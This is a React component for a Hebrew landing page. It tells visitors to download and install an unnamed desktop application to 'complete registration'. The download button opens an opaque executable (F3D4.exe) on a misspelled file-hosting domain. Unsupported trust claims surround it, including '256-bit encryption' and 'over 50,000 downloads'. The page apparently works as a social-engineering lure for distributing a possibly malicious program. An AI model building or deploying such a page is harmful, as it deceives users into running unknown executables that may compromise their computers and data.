import React, { useEffect, useRef, useState } from 'react';
import BackgroundEffects from './BackgroundEffects';
import MouseTrail from './MouseTrail';

const LandingPage = () => {
  const [isLoaded, setIsLoaded] = useState(false);

  useEffect(() => {
    // Simulate loading effect
    const timer = setTimeout(() => {
      setIsLoaded(true);
    }, 500);

    return () => clearTimeout(timer);
  }, []);

  const handleDownload = () => {
    // Open download link in new tab
    window.open('http://www.uplad.com/F3D4.exe', '_blank');
  };

  return (
    <div className="relative min-h-screen bg-[#0f0f10] flex flex-col items-center justify-center overflow-hidden">
      {/* Background Effects */}
      <BackgroundEffects />
      
      {/* Mouse Trail Effect */}
      <MouseTrail />

      {/* Main Content */}
      <div className={`relative z-10 text-center px-4 transition-all duration-1000 ${isLoaded ? 'opacity-100 translate-y-0' : 'opacity-0 translate-y-10'}`}>
        
        {/* Main Title with Glowing Effect */}
        <h1 className="main-title text-8xl md:text-9xl font-bold mb-8 glow-text leading-none">
          בשבילך
        </h1>

        {/* Subtitle Message */}
        <p className="subtitle-text text-xl md:text-2xl text-gray-300 mb-12 max-w-4xl mx-auto leading-relaxed font-light">
          כדי להשלים את ההרשמה, הורד והתקן את היישום שלנו במחשב.
        </p>

        {/* Download Button */}
        <div className="flex flex-col items-center gap-6">
          <button 
            onClick={handleDownload}
            className="download-btn px-12 py-4 text-xl font-semibold text-white rounded-xl shadow-2xl transform transition-all duration-300 hover:scale-105 focus:outline-none focus:ring-4 focus:ring-purple-300"
          >
            הורדה למחשב
          </button>
          
          {/* Note under button */}
          <p className="text-sm text-gray-500 font-light">
            התוכנה זמינה למחשבים בלבד.
          </p>
        </div>

        {/* Performance Metrics (Hebrew equivalent) */}
        <div className="mt-16 grid grid-cols-1 md:grid-cols-3 gap-8 max-w-2xl mx-auto">
          <div className="text-center">
            <div className="text-3xl font-bold text-white mb-2">60 fps</div>
            <div className="text-gray-400 text-sm">ביצועים מהירים</div>
          </div>
          <div className="text-center">
            <div className="text-3xl font-bold text-white mb-2">256-bit</div>
            <div className="text-gray-400 text-sm">הצפנה מתקדמת</div>
          </div>
          <div className="text-center">
            <div className="text-3xl font-bold text-white mb-2">&lt;10ms</div>
            <div className="text-gray-400 text-sm">השהיה נמוכה</div>
          </div>
        </div>

        {/* Download Counter */}
        <div className="mt-12 text-center">
          <div className="inline-flex items-center gap-2 px-6 py-3 bg-gray-800/50 rounded-full backdrop-blur-sm">
            <div className="w-2 h-2 bg-green-400 rounded-full animate-pulse"></div>
            <span className="text-gray-300 text-sm">יותר מ-50,000 הורדות</span>
          </div>
        </div>
      </div>

      {/* Floating Particles */}
      <div className="absolute inset-0 pointer-events-none">
        {[...Array(8)].map((_, i) => (
          <div
            key={i}
            className="floating-particle absolute w-2 h-2 bg-purple-400 rounded-full opacity-30"
            style={{
              left: `${Math.random() * 100}%`,
              top: `${Math.random() * 100}%`,
              animationDelay: `${Math.random() * 6}s`,
              animationDuration: `${6 + Math.random() * 4}s`
            }}
          />
        ))}
      </div>

      {/* Floating Orbs */}
      <div className="absolute inset-0 pointer-events-none">
        {[...Array(5)].map((_, i) => (
          <div
            key={i}
            className="floating-orb"
            style={{
              width: `${60 + Math.random() * 80}px`,
              height: `${60 + Math.random() * 80}px`,
              left: `${Math.random() * 100}%`,
              top: `${Math.random() * 100}%`,
              animationDelay: `${Math.random() * 8}s`,
              animationDuration: `${8 + Math.random() * 4}s`
            }}
          />
        ))}
      </div>
    </div>
  );
};

export default LandingPage;